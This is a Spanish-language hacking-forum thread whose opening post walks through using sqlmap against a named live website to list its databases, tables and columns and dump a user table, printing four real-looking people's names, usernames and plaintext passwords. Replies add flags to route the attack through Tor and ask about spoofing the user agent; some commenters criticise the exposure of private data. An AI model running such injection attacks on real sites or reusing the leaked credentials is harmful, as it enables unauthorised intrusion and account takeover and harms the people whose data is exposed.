(http://1.bp.blogspot.com/-5mQCRtsNjOU/UHJPLAAAnEI/AAAAAAAABYQ/By1gRwebKkM/s256/1.png)
Introducción:En este paper veremos como obtener los datos de admin de una base de datos utilizando SQLMAP.
Para este tutorial usare Backtrack, ya que viene instalado y está listo para usarse.
Para abrirlo vamos a:
Applications >> Backtrack >> Exploitation Tools >> Web Exploitation Tools >> sqlmapA penas abrimos sqlmap, podremos ver todos los parámetros disponibles, ahora solo usaremos los elementales.
(http://2.bp.blogspot.com/-WmTOY-UnvdQ/UHJPNKAdEyI/AAAAAAAABYo/FygdClX4OkM/s1600/2.png)
Voy a usar una web vulnerable
smartenergyhome.euLas querys las haremos desde aquí:
smartenergyhome.eu/eng/seh-buildings.php?id=9Extracción de informaciónComenzaremos sacando los nombres de las bases de datos, para ello tipeamos:
python sqlmap.py -u target.com/index.php?id=9 --dbs(http://2.bp.blogspot.com/-M9gsiPG0Tf8/UHJPMX7yTaI/AAAAAAAABYY/l8Uo1aNLVzY/s1600/3.png)
El programa comenzara a buscar las bases de datos y las mostrara una vez que finalice de correr
(http://1.bp.blogspot.com/-20IbkzAk_Lo/UHJPOtJ6FDI/AAAAAAAABZA/0_MM5XfjFwA/s1600/4.png)
En mi caso me trajo 2, de las cuales una es por el cpanel y la otra es de la web.
La que usaremos será la segunda "
smartene_SEH"
Ahora que tenemos el nombre de la base de datos, sigue buscar las tablas que posee, para ello vamos a tipear:
python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH -- tables(http://4.bp.blogspot.com/-ZWLhbnbFn9c/UHJPNgtTm3I/AAAAAAAABYw/ZZxlW1pS8OA/s1600/5.png)
Este comando nos arrojara todas las tablas que tiene el sistema, y obviamente debemos buscar alguna que contenga datos de administradores para podernos loguear
(http://1.bp.blogspot.com/-t0LjzwaNsc4/UHJPOMMdmOI/AAAAAAAABY4/07v4bgm1CDI/s260/6.png)
En mi caso, la última tabla tiene el nombre "usuarios" por lo tanto, esa debe ser la tabla que tiene los datos de los admines.
Ahora veremos las columnas que tiene esa tabla de usuarios, para ver si en verdad tiene algún usuario y contraseña para luego entrar al panel de admin...
Ahora que conocemos el nombre de la tabla, vamos a tipear ahora lo siguiente:
python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios -- columns(http://1.bp.blogspot.com/-wEikS4S3J60/UHJPOdyrN8I/AAAAAAAABY8/UC4SHVzVr30/s1600/7.png)
Esto nos devolverá los nombres de las columnas que tiene dicha tabla.
(http://4.bp.blogspot.com/-OKxFQw1_UtI/UHJPPO7uhFI/AAAAAAAABZM/Kjs9zYosLoI/s1600/8.png)
Como podemos ver, hemos dado con la tabla que buscábamos. Esta tabla posee usuarios y contraseñas.
Para poder ver que datos contiene esta tabla, vamos a tipear:
python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios --dumpUna vez ejecutado el comando, nos dará los datos que contiene esa tabla
(http://2.bp.blogspot.com/-sQF3_pBC1Eg/UHJPMZn0b9I/AAAAAAAABYc/hNPOKOnbBbc/s1600/10.png)
+----+------------------------+------------------+----------+---------------------+----------+
| id | email | nombre | usuario | editado | password |
+----+------------------------+------------------+----------+---------------------+----------+
| 1 | [email protected] | Gustavo Zapico | gzapico | 2009-03-02 06:02:34 | medica3 |
| 2 | [email protected] | Gen\xeds Bayarri | gbayarri | 2009-03-02 06:20:37 | vis-tek |
| 3 | [email protected] | Josefin Berg | jberg | 2009-03-12 05:05:38 | seh2009 |
| 4 | [email protected] | Laszlo Bax | lbax | 2010-03-26 16:46:18 | seh2009 |
+----+------------------------+------------------+----------+---------------------+----------+
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.
ANTRAX
Gracias por aportar, pero me gustaria hacerlo sin usar tool, pero para eso estoy estudiando sql desde 0
<!-- Saludos -->
Aca te dejo la forma manual desde cero: http://underc0de.org/foro/bugs-y-exploits/sql-injection-desde-cero
Y aca tenes Blind SQLi manual tambien desde cero: http://underc0de.org/foro/bugs-y-exploits/blind-sqli-desde-cero-%28sqli-a-ciegas%29-by-antrax/
Saludos!
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:
Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:
--tor --check-tor --tor-port=35978 --tor-type=SOCKS5
De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias y vemos el protocolo de la proxy y el puerto.
(http://i.imgur.com/EXNDN.png)
El tutorial fue hecho con fines educativos, la falla ya fue reportada.
Yo no colgare un index ni nada de eso.
El que desee hacerlo, adelante
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Aca te dejo la forma manual desde cero: http://underc0de.org/foro/bugs-y-exploits/sql-injection-desde-cero
Y aca tenes Blind SQLi manual tambien desde cero: http://underc0de.org/foro/bugs-y-exploits/blind-sqli-desde-cero-%28sqli-a-ciegas%29-by-antrax/
Saludos!
Muchas Gracias ya los estoy checando
<!-- Saludos -->
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:
Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:
--tor --check-tor --tor-port=35978 --tor-type=SOCKS5
De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias y vemos el protocolo de la proxy y el puerto.
(http://i.imgur.com/EXNDN.png)
Tambien estaria bueno que explique como cambiar el user agent.
Cita de: [Corruptedyte link=topic=11428.msg40819#msg40819 date=1349714884]
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.
bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.
comparto la opinion, si quisieras hacer algo "etico" podrias con el tuto adjuntar un ejemplo de una aplicacion mal codeada a proposito, con las configuraciones que deben ser onda escenario "real". De onda el comentario :P